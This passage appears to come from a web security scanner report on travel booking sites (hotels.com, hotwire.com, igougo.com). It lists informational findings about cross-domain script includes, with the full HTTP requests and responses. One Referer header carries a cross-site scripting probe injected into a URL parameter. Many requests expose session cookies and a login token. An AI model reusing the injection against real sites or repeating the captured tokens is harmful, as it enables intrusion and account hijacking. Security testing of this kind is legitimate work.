Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; SOURCECODE=IGoUGo; TLTSID=F123A950ED5310ED160FDD8181683406; TLTUID=F123A950ED5310ED160FDD8181683406; TRAFFICID=15786488; SCREENWIDTH=1920; SCREENHEIGHT=1200; LOCALE=en%5FUS; CURRENCY=USD; __utma=69973641.2138588342.1317600610.1317600610.1317600610.1; __utmb=69973641.3.10.1317600610; __utmc=69973641; __utmz=69973641.1317600610.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; LANGUAGE=1

cid=82686&locale=en_US&creditCardLastName=&numberOfAdults=2&numberOfChildren=0&numberOfRooms=1&departureDay=7&departureMonth=9&departureYear=2011&arrivalDay=4&arrivalMonth=9&arrivalYear=2011&rateFrequ
...[SNIP]...

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:30:37 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LOCALE=en%5FUS;path=/
Set-Cookie: CURRENCY=USD;path=/
Set-Cookie: LANGUAGE=1;path=/
Vary: Accept-Encoding
Content-Length: 58824

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
   <html>
       <head>
       <title>Book Now - Submit Secure Hotel Reservation</title>
       <meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
<td valign="top" colspan="2" align="center">
   <script src=https://seal.verisign.com/getseal?host_name=WWW.HOTELPLANNER.COM&size=S&use_flash=YES&use_transparent=YES&lang=en></script>
...[SNIP]...

20.62. http://www.hotels.com/hotel/details.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hotels.com
Path:   /hotel/details.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /hotel/details.html?pa=1&pn=1&ps=1&tab=description&destinationId=1643195&hotelId=109368&arrivalDate=10-04-11&departureDate=10-07-11&rooms[0].numberOfAdults=2&roomno=1&validate=false&previousDateful=false&reviewOrder=date_newest_first HTTP/1.1
Host: www.hotels.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotels.com/search.do?searchParams.arrivalDate=10-04-11&pointName&searchParams.departureDate=10-07-11&lon=0.0&queryFormState=CLOSED&monthCheckOut=10&fromHotelDetails=false&destination=Boston%2C&showSimilarDestinations=true&fromLandmark=false&searchParams.rooms[0].numberOfAdults=2&asaReport&dayInMonthCheckIn=4&fromDisambiguation=false&destinationForLandmark&monthCheckIn=10&activeTab=DESTINATION&dayInMonthCheckOut=7&lat=0.0&rooms=1&ppc=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; channel=DC; homepage_search_data="Qm9zdG9uLA..//10/04/11//10/07/11//2//MM/dd/yy//1643195"; s_cc=true; s_sv_sid=1011730152590; mvthistory=124.1.0.i1%3A97.73.1.i3%3A98.6.4%3A137.0.0.i2%3A145.0.0.i2%3A108.1.0.i2%3A152.0.0.i2%3A2.2.1%3A196.1.0%3A92.0.0.i1%3A132.2.0.i2%3A121.503.0.i7%3A138.1.0%3A195.0.0%3A104.0.1%7CHCOM_US; SSLB=1; user=QSplbl9VU3xIQ09NX1VTIUQqMTI0LjEuMC5pMSUzQTk3LjczLjEuaTMlM0E5OC42LjQlM0ExMzcuMC4wLmkyJTNBMTQ1LjAuMC5pMiUzQTEwOC4xLjAuaTIlM0ExNTIuMC4wLmkyJTNBMTk2LjEuMCUzQTkyLjAuMC5pMSUzQTEyMS41MDMuMC5pNyUzQTE5NS4wLjAlM0ExMDQuMC4xJTdDSENPTV9VUw..; s_vi=[CS]v1|27447E9805012D59-4000010860553A8B[CE]; __utma=58230453.1140823611.1317600611.1317600611.1317600611.1; __utmb=58230453.1.10.1317600611; __utmc=58230453; __utmz=58230453.1317600611.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; s_sq=hotelsusprod%2Chotelsallprod%3D%2526pid%253Dsearch%252520result%252520with%252520dates%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.hotels.com%25252Fhotel%25252Fdetails.html%25253Fpa%25253D1%252526pn%25253D1%252526ps%25253D1%252526tab%25253Ddescription%252526destinationId%25253D1643195%252526hotelI%2526ot%253DA; SSRT=oQGJTgA; SSPV=RcAAAAAAAAAAAAAAAAAAAAAAAAQAAAAAAAA

Response

HTTP/1.1 200 OK
Server: Apache
X-hcom-ctx: en_US|HCOM_US
Content-Language: en-US
Cache-Control: private, max-age=0, proxy-revalidate, no-store, no-cache, must-revalidate
Expires: Sat, 26 Mar 2011 15:31:07 GMT
Expect:
Content-Type: text/html;charset=UTF-8
Pragma: no-cache
RTSS: 1
Vary: Accept-Encoding
Date: Mon, 03 Oct 2011 00:28:20 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=1; path=/; domain=.hotels.com
Set-Cookie: SSPV=H7gAAAAAAAIAAAAAAAAAAAAAAAYAAAAAAAA; path=/; domain=.hotels.com; expires=Tue, 02-Oct-2012 00:28:19 GMT
Set-Cookie: homepage_search_data="Qm9zdG9uLCBNYXNzYWNodXNldHRzLCBVbml0ZWQgU3RhdGVz//10/04/11//10/07/11//2//MM/dd/yy//"; Version=1; Domain=.hotels.com; Max-Age=31536000; Expires=Tue, 02-Oct-2012 00:28:19 GMT; Path=/
Set-Cookie: user=QSplbl9VU3xIQ09NX1VTIUQqMTI0LjEuMC5pMSUzQTk3LjczLjEuaTMlM0E5OC42LjQlM0ExMzcuMC4wLmkyJTNBMTQ1LjAuMC5pMiUzQTEwOC4xLjAuaTIlM0ExNTIuMC4wLmkyJTNBMTk2LjEuMCUzQTkyLjAuMC5pMSUzQTEyMS41MDMuMC5pNyUzQTE5NS4wLjAlM0ExMDQuMC4xJTdDSENPTV9VUyFFKjEwOTM2OHwwNC8xMC8yMDExfDA3LzEwLzIwMTF8MiFGKg..; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:28:19 GMT; Path=/
Content-Length: 238921

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xmlns:
...[SNIP]...
<td width="135" align="right" valign="top">
<script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=www.hotels.com&amp;size=S&amp;use_flash=NO&amp;use_transparent=NO&amp;lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.google-analytics.com/ga.js" async="true"></script>
...[SNIP]...

20.63. http://www.hotels.com/search.do

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hotels.com
Path:   /search.do

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /search.do?searchParams.arrivalDate=10-04-11&pointName&searchParams.departureDate=10-07-11&lon=0.0&queryFormState=CLOSED&monthCheckOut=10&fromHotelDetails=false&destination=Boston%2C&showSimilarDestinations=true&fromLandmark=false&searchParams.rooms[0].numberOfAdults=2&asaReport&dayInMonthCheckIn=4&fromDisambiguation=false&destinationForLandmark&monthCheckIn=10&activeTab=DESTINATION&dayInMonthCheckOut=7&lat=0.0&rooms=1&ppc=1 HTTP/1.1
Host: www.hotels.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf?lob=HOTEL&advertiserName=hotels&grp=9702&placeholderUrl=http%3A%2F%2Fwww.travelocity.com%2Fvstrack%3FWA1%3D03020%26WA3%3D742%26WA5%3DDRFContinue%26WA6%3Dair%26dst%3Durl_placeholder&url=http%3A%2F%2Fad.doubleclick.net%2Fclk%3B222113440%3B45762978%3Bg%3Fhttp%3A%2F%2Fwww.hotels.com%2FPPCSearch%3Fcity%3D%24%7Bcity%7D%2C%24%7Bstate%7D%26arrivalDate%3D%24%7BdepartureDate%3Ad%3A%22dd%2Fmm%2Fyyyy%22%7D%26adultsPerRoom%3D2%26numberOfRooms%3D%24%7Brooms%7D%26departureDate%3D%24%7BreturnDate%3Ad%3A%22dd%2Fmm%2Fyyyy%22%7D%26PSRC%3DIGOUGO%26rffrid%3Dmdp.hcom.US.138.160.02&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&sid=bfa7dd53-c988-458c-86df-52443affccb8&uid=20d9c1fc-61a4-45f0-9524-380e68994c01&widget=H_PopUnder&pti=default&src=none&ppi=4a15630f-e16d-42c4-95d2-0852b73fdd75&ctx=92aa9504-b6eb-4091-8b93-6582f63d9555&ccn=1&cgn=150&pos=3&aii=2fc59ddf-790d-4415-832a-eafa2c6a46cb&%24cc=US&%24rc=US&%24adults=1&%24destination=Boston%2C%20MA%20Massachusetts&%24glsId=440663&%24city=Boston&%24countryn=United%20States&%24countryc=US&%24staten=Massachusetts&%24statec=MA&%24lob=HOTEL&%24rooms=1&%24context=92aa9504-b6eb-4091-8b93-6582f63d9555&%24widget=H_PopUnder&%24l=9&%24departureDate=2011-10-04&%24returnDate=2011-10-07&%24aucnt=0&%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&%24sid=bfa7dd53-c988-458c-86df-52443affccb8&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SSRT=Kf2ITgA; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; channel=DC; SSLB=1; SSPV=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA; user=QSplbl9VU3xIQ09NX1VT

Response

HTTP/1.1 200 OK
Server: Apache
X-hcom-ctx: en_US|HCOM_US
Content-Language: en-US
Cache-Control: private, max-age=0, proxy-revalidate, no-store, no-cache, must-revalidate
Expires: Sat, 26 Mar 2011 15:33:11 GMT
Expect:
Content-Type: text/html;charset=UTF-8
Pragma: no-cache
RTSS: 1
Date: Mon, 03 Oct 2011 00:10:04 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Set-Cookie: SSLB=1; path=/; domain=.hotels.com
Set-Cookie: SSPV=ZgAAAAAAAAAAAAAAAAAAAAAAAAYAAAAAAAA; path=/; domain=.hotels.com; expires=Tue, 02-Oct-2012 00:10:04 GMT
Set-Cookie: mvthistory=124.1.0.i1%3A97.73.1.i3%3A98.6.4%3A137.0.0.i2%3A145.0.0.i2%3A108.1.0.i2%3A152.0.0.i2%3A2.2.1%3A196.1.0%3A92.0.0.i1%3A132.2.0.i2%3A121.503.0.i7%3A138.1.0%3A195.0.0%3A104.0.1%7CHCOM_US; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:10:04 GMT; Path=/
Set-Cookie: homepage_search_data="Qm9zdG9uLA..//10/04/11//10/07/11//2//MM/dd/yy//1643195"; Version=1; Domain=.hotels.com; Max-Age=31536000; Expires=Tue, 02-Oct-2012 00:10:04 GMT; Path=/
Set-Cookie: user=QSplbl9VU3xIQ09NX1VTIUQqMTI0LjEuMC5pMTo5Ny43My4xLmkzOjk4LjYuNDoxMzcuMC4wLmkyOjE0NS4wLjAuaTI6MTA4LjEuMC5pMjoxNTIuMC4wLmkyOjIuMi4xOjE5Ni4xLjA6OTIuMC4wLmkxOjEzMi4yLjAuaTI6MTIxLjUwMy4wLmk3OjEzOC4xLjA6MTk1LjAuMDoxMDQuMC4xfEhDT01fVVM.; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:10:04 GMT; Path=/
Content-Length: 368925

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" >
<head>

...[SNIP]...
<td width="135" align="right" valign="top">
<script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=www.hotels.com&amp;size=S&amp;use_flash=NO&amp;use_transparent=NO&amp;lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.google-analytics.com/ga.js" async="true"></script>
...[SNIP]...

20.64. http://www.hotels.com/search/search.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hotels.com
Path:   /search/search.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /search/search.html?cd=10-14-11&dd=10-16-11&hid=205543&nr=1&pn=1&r=2&rl=destination%3A1401516%3APROVIDED%3APROVIDED&vt=LIST HTTP/1.1
Host: www.hotels.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.tripadvisor.com/SmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; s_vi=[CS]v1|27447E9805012D59-4000010860553A8B[CE]; __utma=58230453.1140823611.1317600611.1317600611.1317600611.1; __utmz=58230453.1317600611.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; SSID=BQD8fxscAAAAAAAp_YhOsO4QAin9iE4CAAAAAAAAAAAAiAmJTgCCAAABgwQAAIgJiU4BAIcAAAG0BAAAiAmJTgEA; SSSC=3.G5659051284361178800.2|130.1155:135.1204; SSRT=iAmJTgA; SESSID=1E7124089B9B31810B6A337085BAE51F.hm07tc02; channel=DC; SSLB=1; SSPV=PfwAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAA; mvthistory=185.0.0.i1%3A114.1.0%3A124.1.0.i1%3A130.1.1.i2%3A103.4.1.i6%3A171.1.0%3A48.1.0%3A97.73.1.i3%3A98.6.4%3A142.0.0.i4%3A198.2.0%3A145.0.0.i2%3A200.0.0%3A137.0.0.i2%3A108.1.0.i2%3A190.3.0%3A152.0.0.i2%3A134.0.1%3A196.1.0%3A2.2.1%3A209.0.1%3A147.6.0.i6%3A92.0.0.i1%3A121.503.0.i7%3A132.2.0.i2%3A122.1.0.i3%3A138.1.0%3A149.0.0.i1%3A104.0.1%3A195.0.0%7CHCOM_US; homepage_search_data="Qm9zdG9uLCBNYXNzYWNodXNldHRzLCBVbml0ZWQgU3RhdGVz//10/14/11//10/16/11//2//MM/dd/yy//"; user=...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Apache
X-hcom-ctx: en_US|HCOM_US
Content-Language: en-US
Cache-Control: private, max-age=0, proxy-revalidate, no-store, no-cache, must-revalidate
Expires: Sat, 26 Mar 2011 15:35:18 GMT
Expect:
Content-Type: text/html;charset=UTF-8
Pragma: no-cache
RTSS: 1
Date: Mon, 03 Oct 2011 01:02:34 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Set-Cookie: SSLB=1; path=/; domain=.hotels.com
Set-Cookie: SSPV=DvwAAAAAAAEAAAAAAAAAAAAAAAMAAAAAAAA; path=/; domain=.hotels.com; expires=Tue, 02-Oct-2012 01:02:34 GMT
Set-Cookie: mvthistory=185.0.0.i1%3A114.1.0%3A124.1.0.i1%3A103.4.1.i6%3A171.1.0%3A130.1.1.i2%3A48.1.0%3A97.73.1.i3%3A84.0.0.i2%3A98.6.4%3A142.0.0.i4%3A119.0.2.i2%3A198.2.0%3A145.0.0.i2%3A200.0.0%3A137.0.0.i2%3A108.1.0.i2%3A190.3.0%3A152.0.0.i2%3A134.0.1%3A196.1.0%3A2.2.1%3A209.0.1%3A78.0.1%3A147.0.1.i6%3A92.0.0.i1%3A121.503.0.i7%3A132.2.0.i2%3A184.0.0.i1%3A122.1.0.i3%3A138.1.0%3A149.0.0.i1%3A104.0.1%3A195.0.0%7CHCOM_US; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 01:02:34 GMT; Path=/
Set-Cookie: homepage_search_data="Qm9zdG9uLCBNYXNzYWNodXNldHRzLCBVbml0ZWQgU3RhdGVz//10/14/11//10/16/11//2//MM/dd/yy//1401516"; Version=1; Domain=.hotels.com; Max-Age=31536000; Expires=Tue, 02-Oct-2012 01:02:34 GMT; Path=/
Set-Cookie: user=QSplbl9VU3xIQ09NX1VTIUQqMTg1LjAuMC5pMToxMTQuMS4wOjEyNC4xLjAuaTE6MTAzLjQuMS5pNjoxNzEuMS4wOjEzMC4xLjEuaTI6NDguMS4wOjk3LjczLjEuaTM6ODQuMC4wLmkyOjk4LjYuNDoxNDIuMC4wLmk0OjExOS4wLjIuaTI6MTk4LjIuMDoxNDUuMC4wLmkyOjIwMC4wLjA6MTM3LjAuMC5pMjoxMDguMS4wLmkyOjE5MC4zLjA6MTUyLjAuMC5pMjoxMzQuMC4xOjE5Ni4xLjA6Mi4yLjE6MjA5LjAuMTo3OC4wLjE6MTQ3LjAuMS5pNjo5Mi4wLjAuaTE6MTIxLjUwMy4wLmk3OjEzMi4yLjAuaTI6MTg0LjAuMC5pMToxMjIuMS4wLmkzOjEzOC4xLjA6MTQ5LjAuMC5pMToxMDQuMC4xOjE5NS4wLjB8SENPTV9VUyFFKjEwOTM2OHwwNC8xMC8yMDExfDA3LzEwLzIwMTF8MjoyMDU1NDN8MTQvMTAvMjAxMXwxNi8xMC8yMDExfDI.; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 01:02:34 GMT; Path=/
Content-Length: 371034

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" >
<head>

...[SNIP]...
<td width="135" align="right" valign="top">
<script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=www.hotels.com&amp;size=S&amp;use_flash=NO&amp;use_transparent=NO&amp;lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.google-analytics.com/ga.js" async="true"></script>
...[SNIP]...

20.65. http://www.hotwire.com/hotel/details.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hotwire.com
Path:   /hotel/details.jsp

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665 HTTP/1.1
Host: www.hotwire.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotwire.com/hotel/results.jsp?searchTokenId=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=974DB21E0DA548F45875D88836CCB561; SaneID=974DB21E0DA548F45875D88836CCB56; NSC_qspe-xxx-qfstjtu=ffffffffaf131c8e45525d5f4f58455e445a4a422d6f; hwAnalytics_previousPageName=hotel.results; gsc=1; hotwireLogin=V4XFi9mFuQsCCPy6V/qhrdIccYJFHrJxloNL+OGc4tZkfjnIHGhTi7ltrG1IPXfIeO+uyJQdNdBMLRhhG2FHTMgXg79d4ve0wj4co6fHPBw/6XrC+I2V0VAJjgDrxtP6UCZQAzRZKNmqg6s3BNNiMzoqSlE+9QLVq8LlP5r5sVC9LqYt6r1WejbBqGtX4/QeMydTsx5XDmME0qOPB8zW5aGoplccEyUVyAQw1zoB77fdKkw2wifeN3QXc3uxCTtpmp1Xbz0DxcS4cKS1iGZ7tDS9ulFNeBvx/qJTKhJwy7rJEih5XSyT1Fco8d5rZFOYJfrLMMzpj5kMJEILR9qBNRDl+42pRMtKzavwDRm7Zn4S+YVpyXk9PjDFsc8boH4pNL/i/1SO3SnXZq06Bmb1cMu94wvBIzddV6cWSVnTSkb6zEWjyhKcj/R/L14UAfRNxKLA1dwarM4dx9zfvTJdnTQ5OD8cXu1QsRQx6bhBdHgkaVvI7Yv0CzgZubBDGYZ2py/gVN6nUboAKdWWhnH1+SCb4zGbUyOIkF4m3Q5L+mHwtRpnviW5iB6TzG4qM3vCGJzuO/q61vTeJmSjVVzx75u8crr6cftWqHj6w1ad2e3Pf5CFEtJtPeidw2FziNaUnrZUO8Dg4khW7hU9cY7J7fKZ4GRKCUFiaqRBwocDhg2nL+BU3qdRuu3nLjE0iKGkecN3QDSwuy2hpe08Csu2fupUbvdFv0Cs+iPYTYOKXR36I9hNg4pdHfoj2E2Dil0d+iPYTYOKXR36I9hNg4pdHZkXMwFjN5//l477VJL34Ji0R3huVJCIXPoj2E2Dil0d+iPYTYOKXR0HbQ0daheJbt99vtzXseEa+iPYTYOKXR1PInMvNwnP4qWAQ5Fqf/sURmHo2YOoPtSM+3JgIIVvgfoj2E2Dil0dfPSXg9UVFkdonRAnD1CzZSScdfGLoqChRdyjkfXmqOcml0c5X6k8GJajsUKRNqS+Ouz/Wdyu4BraAnioKq60T2Ii7hTLeddfkVbI7P1I/pc=; hotwirePageModuleState=pgoodCode=H&searchTokenId=1; s_cpm=%5B%5B'sid%253AS250%252Cbid%253AB260711'%2C'1317602289069'%5D%5D; s_vi=[CS]v1|274481F985012F24-6000010920164B07[CE]; quoter_buyer=HQ; s_cc=true; s_sq=%5B%5BB%5D%5D; hwAnalytics_lid=hotel.results.opaque%3Abooking-nav%3Acontinue; hwAnalytics_crossPageVariables=%7B%22prop61%22%3A%22social-proof-m%22%2C%22eVar41%22%3A%222%22%2C%22eVar34%22%3A%22FLU01-01%22%7D; s_nr=1317603699724

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-control: no-store, no-cache, private, must-revalidate
Content-Type: text/html;charset=UTF-8
Date: Mon, 03 Oct 2011 01:01:43 GMT
Content-Length: 131060


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">


<html>
<head>
<meta http-equiv="Content-Language" content="en-us"/>
<meta http-equ
...[SNIP]...
</script>


<script src="http://ak-static.hotwirestatic.com/static/deploy/master/hwCore.js?ver=219395"></script>
...[SNIP]...

20.66. http://www.hotwire.com/hotel/results.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hotwire.com
Path:   /hotel/results.jsp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /hotel/results.jsp?searchTokenId=1 HTTP/1.1
Host: www.hotwire.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.trip.com/hotels.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=974DB21E0DA548F45875D88836CCB561; SaneID=974DB21E0DA548F45875D88836CCB56; hotwireLogin=V4XFi9mFuQsCCPy6V/qhrdIccYJFHrJxloNL+OGc4tZkfjnIHGhTi7ltrG1IPXfIeO+uyJQdNdBMLRhhG2FHTMgXg79d4ve0wj4co6fHPBw/6XrC+I2V0VAJjgDrxtP6UCZQAzRZKNmqg6s3BNNiMzoqSlE+9QLVq8LlP5r5sVC9LqYt6r1WejbBqGtX4/QeMydTsx5XDmME0qOPB8zW5aGoplccEyUVyAQw1zoB77fdKkw2wifeN3QXc3uxCTtpmp1Xbz0DxcS4cKS1iGZ7tDS9ulFNeBvx/qJTKhJwy7rJEih5XSyT1Fco8d5rZFOYJfrLMMzpj5kMJEILR9qBNRDl+42pRMtKzavwDRm7Zn4S+YVpyXk9PjDFsc8boH4pNL/i/1SO3SnXZq06Bmb1cMu94wvBIzddV6cWSVnTSkb6zEWjyhKcj/R/L14UAfRNxKLA1dwarM4dx9zfvTJdnTQ5OD8cXu1QsRQx6bhBdHgkaVvI7Yv0CzgZubBDGYZ2py/gVN6nUboAKdWWhnH1+SCb4zGbUyOIkF4m3Q5L+mHwtRpnviW5iB6TzG4qM3vCGJzuO/q61vTeJmSjVVzx75u8crr6cftWqHj6w1ad2e3Pf5CFEtJtPeidw2FziNaUnrZUO8Dg4khW7hU9cY7J7fKZ4GRKCUFiaqRBwocDhg2nL+BU3qdRuu3nLjE0iKGkecN3QDSwuy2hpe08Csu2fupUbvdFv0Cs+iPYTYOKXR36I9hNg4pdHfoj2E2Dil0d+iPYTYOKXR36I9hNg4pdHZkXMwFjN5//GfFEXccZLnQ9cx0NaloS+foj2E2Dil0d+iPYTYOKXR0HbQ0daheJbt99vtzXseEa+iPYTYOKXR1PInMvNwnP4qWAQ5Fqf/sURmHo2YOoPtSM+3JgIIVvgfoj2E2Dil0dfPSXg9UVFkdonRAnD1CzZSScdfGLoqChRdyjkfXmqOcml0c5X6k8GJajsUKRNqS+Ouz/Wdyu4BraAnioKq60T2Ii7hTLeddfkVbI7P1I/pc=; auth=true; NSC_qspe-xxx-qfstjtu=ffffffffaf131c8e45525d5f4f58455e445a4a422d6f

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-control: no-store, no-cache, private, must-revalidate
Set-Cookie: gsc=3; Expires=Mon, 03-Oct-2011 06:59:59 GMT; Path=/
Set-Cookie: hotwireLogin=...[SNIP]...; Expires=Tue, 02-Oct-2012 00:38:25 GMT; Path=/
Set-Cookie: hotwirePageModuleState=pgoodCode=H&searchTokenId=1; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 03 Oct 2011 00:38:24 GMT
Content-Length: 288536


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">


<html>
<head>
<meta http-equiv="Content-Language" content="en-us"/>
<meta http-equ
...[SNIP]...
</script>


<script src="http://ak-static.hotwirestatic.com/static/deploy/master/hwCore.js?ver=219395"></script>
...[SNIP]...
<link rel="stylesheet" href="http://ak-static.hotwirestatic.com/static/deploy/css/hotel/results/hotelResultsPrint.css?ver=209738" media="print" type="text/css"/>


<script type="text/javascript" src="http://ak-static.hotwirestatic.com/static/deploy/??javascript/core/HwStateSupport.js,javascript/hotel/SidebarFilterComp.js,ver=182672"></script>
...[SNIP]...
</div>


<script type="text/javascript" src="http://ak-static.hotwirestatic.com/static/deploy/javascript/core/HwValidatorSupport.js?ver=177334"></script>
...[SNIP]...

20.67. http://www.igougo.com/WebResource.axd

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.igougo.com
Path:   /WebResource.axd

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /WebResource.axd?d=bcey9zNKaq8jmoZ3QSSEqg2&t=634196413115781250 HTTP/1.1
Host: www.igougo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.igougo.com/traveldeals/ratefinder.aspx?TypeID=1&SourceID=TVLY-dRF-Popunder&adlt=1&end=Bostond123a'%3balert(document.location)//08fa278eb24&rm=1&dest=Boston,%20undefined%20undefined&strtDate=10/04/2011&endDate=10/07/2011
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
